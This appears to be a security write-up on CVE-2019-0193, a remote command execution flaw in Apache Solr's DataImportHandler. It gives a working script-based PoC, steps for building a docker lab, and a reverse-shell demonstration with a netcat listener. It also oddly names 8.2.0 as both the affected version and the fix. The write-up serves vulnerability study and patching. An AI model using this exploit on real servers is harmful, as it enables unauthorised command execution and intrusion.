Apache Solr 远程命令执行漏洞

On August 1, 2019, Apache Solr officially released the CVE-2019-0193 vulnerability warning, with the vulnerability hazard rating of serious.

The vulnerability occurs in Apache Solr's DataImportHandler, an optional but commonly used module for extracting data from databases and other sources. It has a feature in which all DIH configurations can be set through the externally requested dataConfig parameter. Since DIH configurations can contain scripts, attackers can create remote command execution by constructing dangerous requests.

360CERT judges that the vulnerability level is high, and it is recommended that Apache Solr users upgrade in time to prevent attackers from attacking.

POC

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

dataConfig

script![CDATA[

function f1(row){

var run=java.lang.Runtime.getRuntime().exec('touch /tmp/success');

row.put('name', 'Hello World!');

return row;

}

]]/script

document

entity name='person' transformer='script:f1' query='select * from person' pk='id'

field column='id' name='id' /

field column='name' name='name' /

/entity

/document

/dataConfig

漏洞成因

The vulnerability is caused by two reasons:

The user sets up DataImportHandler in the solrconfig.xml file and enables the DataImport function.

The DataImportHandler module allows users to include scripts themselves to configure.

An attacker can construct a malicious script and hand it over to the converter for parsing. During the Solr parsing process, the user's input is not checked, which can cause the attacker to execute commands remotely on the Solr server.

环境搭建

solr部署

This environment adopts docker deployment

Pull the image: docker pull solr: 8.1.1

Start container: docker run –name solr -d -p 8983:8983 -t solr:8.1.1

Visit http://IP:8983/, the apache solr framework is deployed

开启DataImportHandler插件

新建core：

Click Add Core, and the solr system reports an error.

Then execute: docker exec -it –user root solr /bin/bash and enter the solr container.

After entering the container, execute:

1

2

3

4

5

cp /opt/solr-8.1.1/server/solr/configsets/_default/conf /var/solr/data/new_core/

cp /opt/solr/dist/solr-dataimporthandler-8.1.1.jar /opt/solr/server/solr-webapp/webapp/webapp/WEB-INF/lib

cp /opt/solr/dist/solr-dataimporthandler-extras-8.1.1.jar /opt/solr/server/solr-webapp/webapp/webapp/WEB-INF/lib

cd /var/solr/data/new_core/conf/

vim solrconfig.xml

DataImportHandler 插件配置

Add the following XML to solrconfig.xml

1

2

3

4

5

6

requestHandler name='/dataimport'

class='org.apache.solr.handler.dataimport.DataImportHandler'

lst name='defaults'

str name='config'data-config.xml/str

/lst

/requestHandler

Note: The XML format must follow the above format, otherwise an error will be reported!

Execute vim data-config.xml and save the following XML to the file:

1

2

3

4

5

6

7

8

9

dataConfig

dataSource driver='com.mysql.jdbc.Driver' url='jdbc:mysql://IP:3306/securityTest' user='root' password='root' /

document

entity name='person' query='select * from person' pk='id'

field column='id' name='id' /

field column='name' name='name' /

/entity

/document

/dataConfig

Then put mysql-connector-java-5.1.48.jar into the /opt/solr/server/solr-webapp/webapp/webapp/WEB-INF/lib folder

重启 solr

Then restart solr:/opt/solr/bin/solr restart

At this point, the vulnerability environment has been built and the screenshot of the successful construction is as follows:

漏洞测试

访问管理页面

Browser access: http://IP:8983/

开启 Debug 模式

Copy the poc into Configuration:

The commands executed by the victim machine can be replaced in the marked place. This article takes the rebound shell as an example.

开启监听

nc -lp 4567

执行命令

Click Execute with this Configuration

If the execution is successful, it can be found that the shell has rebounded successfully:

影响范围

Apache Solr 8.2.0

修复建议

Upgrade Apache Solr to 8.2.0 or later